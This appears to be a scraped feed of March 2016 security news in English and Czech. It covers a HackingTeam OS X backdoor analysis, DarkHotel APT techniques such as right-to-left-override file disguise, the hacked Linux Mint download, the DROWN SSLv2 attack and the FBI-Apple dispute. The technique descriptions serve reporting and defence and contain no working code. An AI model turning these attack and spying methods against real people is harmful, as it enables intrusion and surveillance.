West’s recent album The Life of Pablo was involved in a piracy concern. He was so outraged when he saw his recent album was being pirated by 500,000 downloads in just two days that he considered taking legal action against The Pirate Bay.
However, in a recent tweet West accidentally revealed his own pirate habits.
It looks like the controversial rapper was torrenting a pirated copy of Xfer Records synthesizer software Serum on The Pirate Bay. The serum is a popular WaveTable editor that costs just $189 for a license.
However, despite having harsh feelings, the Pirate Bay team said it was happy to provide West with tech support.
DJ Deadmau5, co-founder of Xfer Records, called out West as a dick and later he showed some sympathy for West, calling for a Kickstarter campaign to raise fund to help West afford a copy of Serum.


US DoD invites a restricted number of hackers to Hack the Pentagon
2.3.2016 Hacking

Hack the Pentagon – DoD would invite outside hackers to test the cybersecurity of some public US Defense Department resources as part of a pilot initiative.
Which is the best way to discover security vulnerabilities affecting a computer system? Ask a group of hackers to test it. This is the concept behind a bounty program, an organization can hire hackers to test the system and ethically disclose the flaw, receiving a reward. Bug bounties are very popular initiatives among the communities of white hats, principal companies, including Facebook, Google and Microsoft. Facebook, for example, has already paid more than $3 million since 2011, when its bug bounty program was launched.

And what about if I tell you that the organization in question is the pentagon? Yes, it is true, ‘Hack the Pentagon’ is the initiative launched by the US Government, the first ever program of its kind, that aims to test the resilience to cyber attacks of the US defenses.

If the Pentagon will financial reward the hacker, it would be the first government-funded bug bounty initiative in the world.

“The Pentagon said on Wednesday it would invite vetted outside hackers to test the cybersecurity of some public U.S. Defense Department websites as part of a pilot project next month, in the first-ever such program offered by the federal government.”

“Hack the Pentagon” is modeled after similar competitions known as “bug bounties” that are conducted by big U.S. companies, including United Continental Holdings Inc to discover gaps in the security of their networks.” states the Reuters.

At time I was writing the bounty program has not been announced, until today, the Pentagon already uses its own internal security experts (so-called “red teams”) to test its networks, but openness to external hackers could give a major impetus in finding vulnerabilities in government systems, allowing to find new security holes.

The Hack the Pentagon initiative is welcome within the US government, in this way the expert at the Pentagon will be able to identify security issues before hackers can exploit them, with a significant improvement in term of cyber security.

“I am confident that this innovative initiative will strengthen our digital defenses and ultimately enhance our national security,” commented the Defense Secretary Ash Carter.
According to the Reuters, the participants will have to be US citizens and submit to background checks before being accepted to the Hack the Pentagon program, this is the principal difference with a common bug bounty initiative.

The program is being led by the DoD Defense Digital Service, which is a small team of engineers and experts, set up in November 2015, meant to “improve the Department’s technological agility and solve its most complex IT problems.”

In October 2015, Current and former members of the department’s cyber wing of the US Army, Captain Michael Weigand and Captain Rock Stevens, published a paper urging a joint project between the Army Cyber Institute and the US Marine Corps Forces Cyberspace Command. The project aimed to establish a central program for disclosing software vulnerabilities on military systems.

The military experts highlighted how essential aspects of the software lifecycle, like patch management and penetration testing are very difficult to carry on these environments. The systems used in the US Army are exposed by an absence of centralized patch management and penetration testing are not allowed due to the nature of the systems.

They call for a radical change, including the introduction of bug bounties, today internal experts who discovered vulnerabilities have no incentive to report the flaw are no obliged to disclose it, the post refers this bad habit as a “do nothing” culture.

AVRP UR ARMY HAck the Pentagon

In the paper published on the Cyber Defense Review website, the duo proposed the creation of an Army Vulnerability Response Program (AVRP), a bug bounty program run by the US military.

The Army Vulnerability Response Program (AVRP) platforms proposed by the military expert have to enable service people to report bugs free of risk of retribution, and say penetration tests should be promoted as vulnerability scans are inadequate.

“The AVRP will serve as the central reporting mechanism for vulnerabilities in Army networks and will receive reports on poor configurations or gaps in security that could allow attackers to degrade Army systems. These systems include Army digital training management systems, Army Battle Command Systems, logistics procurement systems, and combat platforms deployed in hostile environments. Researchers can report vulnerabilities through a phone hotline or an online submission portal. The AVRP will track all submissions, facilitate the flow of communication with affected entities, and play an integral role in resolving the vulnerability throughout US government networks,” the paper reads.

The creation of a bug bounty program is an urgency for the US Government, it comes after the numerous successfully attacks suffered by US entities, including OPM, the White House, and The State Department.


The return of HackingTeam with new implants for OS X
2.3.2016 Zdroj: Kaspersky Apple
Last week, Patrick Wardle published a nice analysis of a new Backdoor and Dropper used by HackingTeam, which is apparently alive and well. Since HackingTeam implants are built on-demand for each target, and it appears that the samples mentioned in the blog were found in-the-wild, we wanted to take a closer look: to see how it works and what its functionality reveals about the possible interest of the attackers behind this latest Backdoor.

Encryption key

The main Backdoor component receives its payload instructions from an encrypted Json configuration file. In order to decrypt the configuration file, we began by using known keys, but none of them were able to decrypt the file. Upon checking the binary file we were able to identify that the function used to encode the file is still AES 128, so we started to look for a new encryption key. We located the initialization of the encryption routine, where the key is passed as an argument.

 

By following this code we were able to find the new key used to encrypt the configuration file.

 

As you can see, the key is 32 bytes long, so just the first 16 bytes are used as the key. By using this key on our script we successfully decrypted the configuration file, which turns out to be a Json format file carrying instructions on how that particular Backdoor needs to operate on the target’s OS X machine:

 

What does the implant do?

It takes screenshots
It synchronizes with or reports stolen information to a Linode server located in the UK, but only when connected to Wi-Fi and using a specific Internet channel bandwidth defined by the Json configuration file:
 

It steals information on locally-installed applications, address book entries, calendar events and calls. OS X allows iPhone users to make such calls straight from the desktop when both are connected to the same Wi-Fi network and trusted.
It spies on the victim by enabling frontal camera video recording, audio recording using the embedded microphone, sniffing local chats and stealing data from the clipboard.
It also steals emails, SMS and MMS messages from the victim, which are also available on the OS X desktop when an iPhone is paired.
 

Among other functionalities it also spies on the geolocation of the victim.

It’s interesting to note that the Json file says that the start date of the operation is October 16 (Friday), 2015. This indicates that this is a fresh HackingTeam Backdoor implant.

For some reason the attacker was not interested in any emails sent to or from the target before that date but only from then on.

Kaspersky Lab detects the above-mentioned Backdoor implants as Backdoor.OSX.Morcut.u and its dropper as Trojan-Dropper.OSX.Morcut.d


FBI Admits — It was a 'Mistake' to Reset Terrorist's iCloud Password
2.3.2016 Apple
Yes, FBI Director James Comey admitted that the investigators made a "mistake" with the San Bernardino investigation during a congressional hearing held by the House Judiciary Committee.
Apple is facing a court order to help the FBI unlock an iPhone belonged to San Bernardino Shooter by developing a backdoored version of iOS that can disable the security feature on the locked iPhone.
Apple's Chief Executive Tim Cook has maintained his stand over Privacy and Security, saying the company will fight the court order because it is dangerous for the security and privacy of all of its users.
As the company earlier said, Apple had been helping the FBI with the investigation in San Bernardino case since early January by providing an iCloud backup of Farook's iPhone under a court order and ways to access Farook's iPhone…
...but the problem, according to Apple, was that the feds approached the company after attempting a 'blunder' themselves.
Also Read: FBI Director — "What If Apple Engineers are Kidnapped and Forced to Write Code?"
Just after the San Bernardino terrorist attacks, an unnamed local police official 'Reset the Apple ID Passcode' associated with the shooter's iPhone 5C in "less than 24 hours after the government took possession of the device" in an attempt to access the data.
When the feds approached Apple to help them brute force the passcode without losing data, the company suggested the FBI an alternative way, i.e.:
Connect Farook's iPhone to the Internet by taking it to a known Wi-Fi range. This way his iPhone would have automatically backed up device data with his iCloud Account.
FBI Director: It was a 'Mistake' to Reset iCloud Password
However, when one of the committee members asked Comey about whether the iPhone had its iCloud password changed, preventing the phone from backing up to accessible Apple servers.
Comey was forced to admit that the iCloud password was changed at the FBI's request, calling it a "mistake." Though the FBI previously stated that changing the iCloud password was not a screw-up.
"As I understand from the experts, there was a mistake made in that 24 hours after the attack where the [San Bernardino] county at the FBI's request took steps that made it hard—impossible—later to cause the phone to back up again to the iCloud," Comey said in testimony.
Must Read: Apple is working on New iPhone Even It Can't Hack.
FBI Asked NSA to Unlock iPhone, But NSA couldn't Do it
This was not the only difficult question Comey fielded in the hearing. Comey was also asked how many other federal agencies the Federal Bureau of Investigation (FBI) had asked for help.
Apple itself asked the FBI similar question last week: If the FBI wants to hack an iPhone, why doesn't it just ask the NSA?
Comey replied that people who watch too much television exaggerated the technical capabilities of federal agencies. He did directly respond to a question about whether the U.S. National Security Agency (NSA) helped.
His answer was pretty clear: No, the NSA could not do it.
Also Read: Apple Can Unlock iPhones, Here's How to Hack-Proof your Device.
Here's what Rep. Judy Chu, Democrat of California asked Comey during the hearing on "The Encryption Tightrope: Balancing Americans' Security and Privacy":
I'd like to ask about law enforcement finding technical solutions....Has the FBI pursued these other methods tried to get help from within the federal government, such as from agencies like the NSA?
Here's the response from Comey:
Yes is the answer. We've talked to anybody who will talk with us about it, and I welcome additional suggestions.
During the hearing, Comey wanted to highlight Apple's capability to create a backdoor to unlock the iPhone's encryption, a fact Apple has admitted.
Also Read: Apple hires developer of World's Most Secure Messaging App.
From the beginning, the members of the House Judiciary Committee indicated a strong disapproval of the FBI's actions in the San Bernardino case. Rep. Conyers, a ranking member of the committee, noted that he has long opposed mandating backdoors in a service.


DarkHotel hackers are back targeting Chinese Telecom
2.3.2016 Hacking

The DarkHotel APT group is back and it is targeting executives at telecommunications companies in China and North Korea.
According to threat intelligence start-up ThreatBook, the DarkHotel APT group is targeting executives at telecommunications companies in China and North Korea.

The Darkhotel espionage campaign was first uncovered by security experts at Kaspersky Lab in November 2014. The experts discovered that the hacking campaign was ongoing for at least four years while targeting selected corporate executives traveling abroad. According to the experts, threat actors behind the Darkhotel campaign aimed to steal sensitive data from executives while they are staying in luxury hotels, the worrying news is that the hacking crew is still active.

The attackers appeared as highly skilled professionals that exfiltrate data of interest with a surgical precision and deleting any trace of their activity. The researchers noticed that the gangs never go after the same target twice. The list of targets includes CEOs, senior vice presidents, top R&D engineers, sales and marketing directors from the USA and Asia traveling for business in the APAC region.

Experts at ThreatBook dubbed the new campaign DarkHotel Operation 8651, the hackers have already compromised at least one organization by using spear phishing emails.

The spear phishing messages came with malicious documents attached, typically a crafted SWF file embedded as a downloadable link in a Word document.

The DarkHotel hackers exploited the Adobe Flash vulnerability CVE-2015-8651, patched by Adobe on Dec. 28 with an out-of-band patch.

The attackers disguise the malicious code a component of the OpenSSL library. Experts noticed that the malware implements a number of anti-detection measures, including anti-sandbox and just-in-time decryption.

To better understand the DarkHotel group, let me provide you further details emerged by an update provided by Kaspersky Lab in August 2015. Kaspersky confirmed that the organizations targeted by the DarkHotel APT in 2015 were located in North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, India, Mozambique and Germany.

Darkhotel relied on phishing emails containing links to Flash Player exploits disclosed following the data breach suffered by the Hacking Team surveillance firm.

“…at the beginning of July, it began to distribute what is reported to be a leaked Hacking Team Flash 0day. It looks like the Darkhotel APT may have been using the leaked HackingTeam Flash 0day to target specific systems. We can pivot from “tisone360.com” to identify some of this activity. ” Kaspersky wrote in a blog post.

The DarkHotel APT used obfuscated HTML Application (HTA) files to serve backdoor and downloader code on infected systems since 2010, in August security experts discovered new variants of the malicious HTA files.

“It’s somewhat strange to see such heavy reliance on older Windows-specific technology like HTML applications, introduced by Microsoft in 1999,” experts noted.

DarkHotel APT backdoor

The hackers also improved the obfuscation techniques using more efficient evasion methods, in one case the attackers used a signed downloaders developed to detect known antivirus solutions.

The spear-phishing emails used by the Darkhotel group in the past contain .rar archives that appeared to include a harmless .jpg file. In reality, the file is a .scr executable that appears like a JPEG using a technique known as right-to-left override (RTLO). When the file is opened, an image is displayed in the Paint application, while the malicious code is executed in the background.

Another novelty for the espionage campaign run by the Darkhotel APT group is the use of stolen digital certificates that are used to sign malware.

According to the experts at Kaspersky, the APT group appears to be Korean speaker.


Šifrování nechápou ani brazilské úřady. Ve vězení skončil viceprezident Facebooku/WhatsApp
2.3.2016
Zabezpečení

Zatímco se ve Spojených státech řeší kauza FBI vs. Apple, v níž odmítá technologický gigant zpřístupnit zašifrovaný obsah telefonu, v Brazílii posunuly úřady podobný spor ještě dál. Doplatil na to viceprezident Facebooku pro Latinskou Ameriku, který má na starosti komunikátor WhatsApp. V úterý jej podle Fortune zatkla policie a skončil ve vazbě.

Důvodem je podobný postoj jako v případě Applu. Provozovatelé aplikace WhatsApp, jež komunikaci šifruje, odmítli zpřístupnit policii komunikaci několika podezřelých. Vydat ji samozřejmě nemohli – na serverech služby je zašifrována. To však brazilským úřadům nezabránilo v tom, aby tento postup označili za maření vyšetřování.

Prvním zásahem bylo odstavení služby na 48 hodin loni v prosinci. Nyní to odnesl vysoký manažer, který byl zadržen při cestě do kanceláře. V prohlášení brazilské policie je uvedeno jako důvod opakované nedodržování nařízení soudu. Ten vyšetřoval několik případů obchodu s drogami.


Hackeři ISIS se netrefili, místo Googlu sestřelili web nabízející SEO
2.3.2016
Hacking
Hackerská skupina Cyber Caliphate Army (CCA) navázaná na teroristickou organizaci ISIS se nechala slyšet, že se hodlá zaútočit na samotný Google. Prostřednictvím sítě Telegram ohlásila útok na pondělí, jenže nejnavštěvovanější web zůstal pochopitelně nedotčený. Místo něj to však odnesl web Add Google Online, který se specializuje na optimalizaci stránek pro vyhledávače (SEO). Informoval o tom Newsweek.

isis-hackers-google-hacked-cca-caliphate-cyber-army.jpg
Útok na Google odnesl web indické společnosti Add Google Online

Na napadeném webu se objevilo logo skupiny obsahující vlajku ISIS s všeříkajícím nápisem HackedBy:CCA. Ačkoliv nemá společnost registrovaná v Indii s Googlem nic společného, přesto si ji útočníci vybrali. Podobně v minulosti útočili na web společnosti zabývající se solární energií, stránky japonské tanečnice nebo firmy prodávající laminátové podlahy. Podle odborníků tím organizace napojená na ISIS chce především demonstrovat rostoucí sílu, která by mohla být v budoucnu použita k útoku na důležitější cíle.

Z napadeného webu Add Google Online se mezi tím stalo pískoviště pro další hackerské skupiny. Aktuálně ji má pod kontrolou n3far1ous a po otevření webu najdete dialogové okno s nápise Eat this ISIS.


Hacknutý web Linux Mint šířil napadenou verzi systému

2.3.2016 Hacking

Stovky lidí si stáhly Linux Mint doplněný o škodlivý kód, zadní vrátka. Útočník je chtěl využít pro vybudování botnetu.
Linux Mint měl před týdnem hacknutý web a lidé, kteří si odtamtud stáhli tuto (třetí nejpopulárnější) distribuci Linuxu, si ve skutečnosti stáhli upravený Mint obsahující backdoor. Pokud vám to připadá nemožné, tak bohužel. Stačí se podívat na Beware of hacked ISOs if you downloaded Linux Mint on February 20th!

Podstatné je, že k napadení došlo, ale velmi rychle se na něj přišlo. Hacker ovlivnil pouze Linux Mint 17.3 Cinnamon ISO a pouze 20. února 2016 (berte v úvahu US časovou zónu).

Napadenou verzi bylo možné stáhnout pouze jako ISO „odkazem z webu“, pokud jste tedy ke stahování používali torrent nebo stahovali přímo z Linuxmint.com (ne přes odkaz na něm), napadenou verzi nemáte. Ověřit si, co jste si případně stáhli, je možné pomocí MD5 kontrolního součtu (najdete je ve výše uvedeném oznámení). Případně podle přítomnosti /var/lib/man.cy v systému.

Podle hackera, který používá jméno „Peace“, si upravený Mint stáhlo několik set lidí, což je poměrně dost, celodenní počet stažení v ten den měl být něco přes tisícovku. Mimo téhle patálie hacker uvádí, že se mu podařilo dvakrát získat i kompletní kopii fóra z webu, jednu z 28. ledna, druhou z 18. února. V té jsou osobní informace uživatelů – e-maily, data narození, profilové obrázky a kódovaná hesla. Ta jsou kódována pomocí PHPass a tím pádem je možné získat jejich čitelnou podobu.

Pokud jste tedy používali fórum na Linux Mint webu, považujte raději vaše tamní heslo za veřejně dostupné. Nejenom proto, že kompletní dump se objevil na dark webu a obsahuje přes 70 tisíc údajů o účtech. Dobrá zpráva je, že haveibeenpwned.com vám umožní zjistit, zda došlo k úniku právě vašeho hesla.

Podle Hacker explains how he put „backdoor“ in hundreds of Linux Mint downloads je „Peace“ sólovým hráčem, který nemá žádné spojení s hackerskými skupinami. Na web Linux Mint se mu podařilo dostat přes zranitelnost, kterou objevil v lednu. 20. února pak nahradil ISO vlastní modifikovanou podobu (velmi pravděpodobně nikoliv ISO přímo na serveru, ale jen odkaz na něj ze stránky s odkazy na stažení, plyne z ostatních informací). Aby se pojistil, tak pozměnil i informace o kontrolních součtech (MD5). Motivací mělo být to, že si chtěl z napadených počítačů vytvořit botnet, k čemuž měl použít známý a snadno použitelný malware jménem Tsunami.

Pokud se vám podařilo v uvedený čas (sobota 20. února, s ohledem na časový posun může jít u nás až o neděli 21. února) stáhnout napadenou verzi Mintu, tak ISO zahoďte, stejně jako případné vypálené DVD. Máte-li už systém nainstalovaný, tak virtuál zlikvidujte, stejně jako případnou USB klíčenku. Instalace na počítači je také ztracená, může tam být cokoliv dalšího, takže vás čeká čistá instalace.


Facebook's Vice President Arrested in Brazil for Refusing to Share WhatsApp Data
2.3.2016 Social Site
Apple is not the only technology giant battling against authorities over a court order; Facebook is also facing the same.
Brazil’s federal police arrested Facebook Latin America Vice President for failing to comply with court orders to help investigators in a drug trafficking case that involves WhatsApp, a popular messaging app owned by Facebook that has over 100 Million users in Brazil.
Facebook VP Diego Jorge Dzodan was arrested on his way to work in São Paulo, Brazil today because the company refused to provide details of a WhatsApp user involved in organized crime and drug trafficking.
Dzodan is still in police custody and is responding to police questioning in Sao Paulo, Local media reported.
According to a statement released by a spokesperson from WhatsApp:
"We are disappointed that law enforcement took this extreme step. WhatsApp cannot provide information we do not have. We cooperated to the full extent of our ability in this case, and while we respect the important job of law enforcement, we strongly disagree with its decision."
In December 2015, the Brazilian court blocked WhatsApp messaging service temporarily for 24 hours in Brazil, after the company refused to hand over the content of communications between alleged drug dealers involved in the drug trafficking case.
...and the refusal now resulted in the arrest of Facebook VP.
At the time of WhatsApp blackout in Brazil, Facebook’s Chief Executive Officer Mark Zuckerberg said that he was stunned by the "extreme decision by a single judge to punish every person in Brazil who uses WhatsApp."
Today’s arrest of Facebook VP comes as a New York judge ruled that the United States government have no right to force Apple to unlock an iPhone involved in a drug case.
Apple is also fighting a legal battle against a court order that demands the company to help the FBI unlock an iPhone 5C belonging to the one of the shooters involved in the San Bernardino massacre.


FBI Director — "What If Apple Engineers are Kidnapped and Forced to Write (Exploit) Code?"
2.3.2016 Hacking
What If Apple Engineers are Kidnapped and Forced to Write (Exploit) Code?
Exactly this was what FBI Director James Comey asked in the congressional hearing on Tuesday.
The House Judiciary Committee hearing on "The Encryption Tightrope: Balancing Americans' Security and Privacy" over the ongoing battle between Apple and the FBI ended up being full of drama.
The key to the dispute is whether the Federal Bureau of Investigation (FBI) can force Apple to develop a special version of its mobile operating system that would help the agency unlock an iPhone belonged to San Bernardino shooter Syed Farook.
FBI Director James Comey was there with a prepared testimony about why the FBI wants Apple to create a backdoor into the killer's iPhone.
Comey: Encryption is a Long-Term Threat to Law Enforcement
Yesterday, a New York magistrate judge refused a similar order in a drug case in which the authorities asked Apple to help with the data stored in an unlocked iPhone.
The judge suggested that the government’s interpretation of the All Writs Act – the same 1789 law the FBI is invoking in the San Bernardino case to compel Apple to write a backdoor – would weaken the separation of powers as well as trample on the United States Constitution itself.
Comey, who portrayed Encryption as a long-term threat to the law enforcement because it lets criminals "go dark," said:
"Slippery slope arguments are always attractive, but I suppose you could say, 'Well, Apple's engineers have this in their head, what if they're kidnapped and forced to write software?' That's where the judge has to sort this out, between good lawyers on both sides making all reasonable arguments."
By making this comment, Comey wants to highlight that Apple is capable of creating a backdoor to unlock the iPhone's encryption, a fact Apple has admitted.
It seems that certain Apple engineers are guided on what to do if they're kidnapped, and according to a source with knowledge of Apple's security practices, the engineers are told to "go along with the demands and do whatever is necessary to survive."
Simply "Do whatever they ask. No heroes."

Apple: Can not Weaken Security of All of Our Products
Apple General Counsel Bruce Sewell, who was also prepared with his testimony, argued how a court order could compel the company to circumvent its own encryption technology in an effort to get at the contents of an iPhone.
The FBI wants Apple to write a backdoored version of iOS that would help the feds circumvent iPhone's security measures. Apple countered that doing so would not only undermine the security of all its products, but also set a troubling example for the tech industry.
Swell said, "Building that software tool would not affect just one iPhone. It would weaken the security for all of them."
Apple Working on Unhackable iPhones
This kidnapping issue could also be resolved soon, as Apple is working on an unbreakable iPhone that even the company can not hack.
In addition, the company has also hired Frederic Jacobs, one of the key developers of World's most secure, encrypted messaging app Signal in order to enhance its iPhone security that even it can not break.
If this is not enough, Apple is also working on encrypting iCloud backups that only the account owner would have access, eliminating either way for the FBI or hackers that could expose its users data.


33 percent of all HTTPS websites open to DROWN attack

2.3.2016 Computer Attack

Security experts presented the DROWN attack that exploits a new critical security vulnerability affecting the OpenSSL.
Security experts have discovered a new critical security vulnerability affecting the OpenSSL, it has been estimated that more than 11 Million websites and e-mail services are open to cyber attacks.

The new attack, dubbed DROWN (stands for Decrypting RSA with Obsolete and Weakened eNcryption), allow attackers to access users’ sensitive data over secure HTTPS communications.

“If you’re running a web server configured to use SSLv2, and particularly one that’s running OpenSSL (even with all SSLv2 ciphers disabled!), you may be vulnerable to a fast attack that decrypts many recorded TLS connections made to that box. Most worryingly, the attack does not require the client to ever make an SSLv2 connection itself, and it isn’t a downgrade attack. Instead, it relies on the fact that SSLv2 — and particularly the legacy “export” ciphersuites it incorporates — are pure poison, and simply having these active on a server is enough to invalidate the security of all connections made to that device.” states the high-level description of the attack.

The attack could be successfully carried out in a few hours and in some cases the attackers is able to decrypt traffic in a few seconds.

“We’ve been able to execute the attack against OpenSSL versions that are vulnerable to CVE-2016-0703 in under a minute using a single PC. Even for servers that do not have these particular bugs, the general variant of the attack, which works against any SSLv2 server, can be conducted in under 8 hours at a total cost of $440.” explained the researchers.

DROWN is a cross-protocol attack that exploits vulnerabilities in the SSLv2 implementation against transport layer security (TLS), the attacks doesn’t work against the SSLv2 connections.

DROWN exploits a bug in SSLv2 protocol implementation to attack the security of connections made under a different protocol, in this case, TLS.

By using the Bleichenbacher attack, threat actors can decrypt the private RSA keys and unlock “secure” servers that use the same private key.

The attacker just needs to send specially crafted malicious packets to a server to decrypt HTTPS connections.

DROWN attack
“You’re just as much at risk if your site’s certificate or key is used anywhere else on a server that does support SSLv2,” security researchers noted. “Common examples include SMTP, IMAP, and POP mail servers, and secondary HTTPS servers used for specific web applications.”

A group of researchers from universities in Germany, the US and Israel alongside with two OpenSSL developers, have implemented the attack and demonstrated they can decrypt a TLS 1.2 handshake using 2048- bit RSA in under eight-hours using Amazon EC2, at a cost of $440.

The impact of the DROWN is serious, it has been estimated that more than 33 percent of all HTTPS servers is vulnerable to the attack, roughly 11.5 Million servers worldwide, including Alibaba, BuzzFeed, Flickr, Samsung, Sina, StumbleUpon, Weibo, Yahoo, and 4Shared.

The DROWN attack also works against Microsoft’s Internet Information Services versions 7 and earlier, as well as prior to 3.13 versions of the Network Security Services (NSS) Cryptographic library.

Users that want to test if a website is vulnerable to the DROWN attack can use the test.drownattack.com.
A patch for the vulnerability is already available in the last OpenSSL update.

Security experts have no doubts, now that the DROWN attack has been disclosed threat actors may actively exploit the flaw to attack servers.

Users need to update their OpenSSL to the newer versions 1.0.2g or 1.0.1s. In order to avoid the attack, it is possible to disable the SSLv2, as well as make sure that the private key isn’t shared across any other servers.

If you want to receive more details on the attacks give a look to the paper “DROWN: Breaking TLS using SSLv2” or give a look to the interesting post published by Matthew Green, a professor at Johns Hopkins University.


Chrání EU dostatečně naše data? Podle muže, který „porazil Facebook“ ne…

2.3.2016 Bezpečnost
Evropská komise zveřejnila detaily dohody o ochraně dat, uzavřené s USA, tzv. Privacy Shield. „Štít“ nahrazuje dohodu známou jako Safe Harbor, kterou loni v říjnu smetl ze stolu Soudní dvůr Evropské unie, a nastavuje rámec pro přenos osobních dat Evropanů do USA.

Dohoda má zajistit, že osobní data občanů Evropské unie budou v zámoří chráněna stejným způsobem jako v Evropě, tedy jako dle unijního práva. Než nabude platnosti, mohou se k ní ještě členské státy EU, jakož i zástupci států pro ochranu dat, vyjádřit.

Její součástí je mimo jiné závazek k vytvoření postu ombudsmana pro stížnosti občanů EU v souvislosti se sledováním jejich komunikace a internetových aktivit ze strany USA.

Na dohledu nad dodržování pravidel se přitom mají podílet i společnosti sdružené pod hlavičkou DigitalEurope, jako jsou Apple, Google či Microsoft.

„Naše společnosti se zavazují k vysokému stupni ochrany dat během zaoceánských přenosů a také k rychlému zavedení nových pravidel,“ uvedl John Higgins, generální ředitel DigitalEurope.

„Privacy Shield poskytne silnou ochranu soukromí a zákonné jistoty pro podnikatele, a zároveň prohloubí vzájemnou důvěru mezi Amerikou a Evropou,“ uvádí za „druhou stranu“ pro změnu Computer and Communications Industry Association.

Ne každého však nová dohoda uspokojuje. Výhrady má například rakouský právník Max Schrems, který ochranu osobních dat kritizuje dlouhodobě a jehož soudní bitva s Facebookem, ve finále vedla ke konci Safe Harbor.

„Evropská unie a USA se snaží zkrášlit prase vrstvami rtěnky, ovšem klíčové problémy zůstávají nevyřešené,“ nebere si servítky.

A upozorňuje například na to, že i navzdory dohodě mohou zámořské tajné služby sledovat evropské občany v celkem šesti vymezených případech, například při podezření z terorismu či špionáže.

„USA tak vlastně otevřeně přiznávají, že porušují pravidla Evropské unie přinejmenším v šesti případech,“ poukazuje Schrems.

Dokument k Privacy Shield je zatím přístupný pouze anglicky, v případě zájmu si jej však můžete přečíst zde.


DROWN Attack — More than 11 Million OpenSSL HTTPS Websites at Risk
1.3.2016 Computer Attack
A new deadly security vulnerability has been discovered in OpenSSL that affects more than 11 Million modern websites and e-mail services protected by an ancient, long deprecated transport layer security protocol, Secure Sockets Layer (SSLv2).
Dubbed DROWN, the highly critical security hole in OpenSSL was disclosed today as a low-cost attack that could decrypt your sensitive, secure HTTPS communications, including passwords and credit card details…
...and that too in a matter of hours or in some cases almost immediately, a team of 15 security researchers from various universities and the infosec community warned Tuesday.
Here’s what the security researchers said:
"We've been able to execute the attack against OpenSSL versions that are vulnerable to CVE-2016-0703 in under a minute using a single PC. Even for servers that do not have these particular bugs, the general variant of the attack, which works against any SSLv2 server, can be conducted in under 8 hours at a total cost of $440."
What is DROWN Attack? How it Abuses SSLv2 to attack TLS?
DROWN stands for "Decrypting RSA with Obsolete and Weakened eNcryption."
DROWN is a cross-protocol attack that uses weaknesses in the SSLv2 implementation against transport layer security (TLS), and that can "decrypt passively collected TLS sessions from up-to-date clients."
While latest versions don't allow SSLv2 connections by default, administrators sometimes, unintentionally override those settings in an attempt to optimize applications.
"You’re just as much at risk if your site’s certificate or key is used anywhere else on a server that does support SSLv2," security researchers noted. "Common examples include SMTP, IMAP, and POP mail servers, and secondary HTTPS servers used for specific web applications."
DROWN attack could allow an attacker to decrypt HTTPS connections by sending specially crafted malicious packets to a server or if the certificate is shared on another server, potentially performing a successful Man-in-the-Middle (MitM) attack.
How Deadly is OpenSSL DROWN Attack?
drown-attack
More than 33 percent of all HTTPS servers are vulnerable to DROWN attack.
Although the critical flaw affects as many as 11.5 Million servers worldwide, some of Alexa's top websites, including Yahoo, Alibaba, Weibo, Sina, BuzzFeed, Flickr, StumbleUpon, 4Shared and Samsung, are vulnerable to DROWN-based MitM attacks.
Besides the open-source OpenSSL, Microsoft's Internet Information Services (IIS) versions 7 and earlier, as well as prior to 3.13 versions of the Network Security Services (NSS) Cryptographic library built into many server products are also open to DROWN attack.
How to Test DROWN OpenSSL Vulnerability?
You can find out if your website is vulnerable to this critical security hole using the DROWN attack test site.
However, the good news is that academic researchers uncovered the DROWN security hole and a patch for the vulnerability has already been made available with an OpenSSL update today.
The Bad news is that the DROWN attack can conduct just under a minute to exploit and now that the bug has been disclosed, it may be actively used by hackers to attack servers.
Here’s How to Protect Yourself:
OpenSSL 1.0.2 users are strongly advised to upgrade to OpenSSL 1.0.2g and OpenSSL 1.0.1 users are recommended to upgrade to OpenSSL 1.0.1s. And if you are using another version of OpenSSL for security, you should move up to the newer versions 1.0.2g or 1.0.1s.
In order to protect yourself against the DROWN attack, you should ensure SSLv2 is disabled, as well as make sure that the private key isn’t shared across any other servers.
Those already vulnerable to DROWN attack do not need to re-issue certificates but are recommended to take action in order to prevent the attack immediately.
SSLv2 dates back to the 1990s-era and is enabled accidentally or automatically while setting up a new server, which makes DROWN attacks work. It’s due to the support of weak ciphers that were added to all versions of SSL and TLS prior to 2000 as part of United States government's export regulations.
In fact, "secure" servers can also be hacked because they are on the same network as vulnerable servers. By using the Bleichenbacher attack, private RSA keys can be decrypted, which results in unlocking "secure" servers that use the same private key.
You can find more technical details and a list of the top vulnerable websites on the DROWN Attack website.
In addition, Matthew Green, a professor at Johns Hopkins University and famous cryptographer, has also published a blog post explaining how DROWN works.


Waiting for a court ruling, a New York Judge rejected FBI request to unlock an iPhone
1.3.2016 Apple

The federal magistrate Judge James Orenstein has ruled in favor of Apple, rejecting the FBI request to unlock an iPhone.
In the last weeks, we have followed the dispute between Apple and FBI regarding the possibility to unlock the iPhone used by one of the San Bernardino shooters.

The FBI required Apple to modify the iOS operating system running on the terrorist’s iPhone by creating a specific update to push into the device and that allows to disable security measures.

News of the day is the victory obtained by the Apple company in court against the Federal Bureau of Investigation, the federal magistrate Judge James Orenstein has ruled in favor of Apple, rejecting the request to oblige the giant of Cupertino to help the feds in accessing data stored from a locked iPhone in another criminal case.

The ruling was issued on Monday by the Judge Orenstein for the Eastern District of New York as part of the criminal case against Jun Feng, a man who was pleading guilty in October last year to drug charges.

FBI against Apple judge ruling
Also in this case, the authorities seized the iPhone of the accused, but they were not able to access its content. The Drug Enforcement Administration (DEA) and the FBI decided to request the judgment of the court to obtain an order requiring Apple to unlock the device.

The law enforcement agencies invoked the “the authority of the All Writs Act of 1789,” an old law that states US authorities could bypass the iPhone’s security measures.

Orenstein rejected the request and argued that the government can not misuse the All Writs Act to force private companies to help access data stored in a locked device.
“As set forth below, I conclude that in the circumstances of this case, the government’s application does not fully satisfy the statute’s threshold requirements: although the government easily satisfies the statute’s first two elements, the extraordinary relief it seeks cannot be considered “agreeable to the usages and principles of law.” In arguing to the contrary, the government posits a reading of the latter phrase so expansive – and in particular, in such tension with the doctrine of separation of powers – as to cast doubt on the AWA’s constitutionality if adopted.” wrote Orenstein.

“Moreover, I further conclude that even if the statute does apply, all three discretionary factors weigh against issuance of the requested writ, and that the Application should therefore be denied as a matter of discretion even if it is available as a matter of law”

The All Writs Act isn’t the unique law invoked in this case, another important law, the Communications Assistance for Law Enforcement Act (CALEA) forbids any interference by government.

Waiting for a final rule for the San Bernardino, Apple is going on in its personal fight in defense of the users’ privacy. It has been reported that the company is already working on a new iPhone that is impossible to hack, even by Apple experts.


New York Judge Rules FBI Can't Force Apple to Unlock iPhone
1.3.2016 Apple
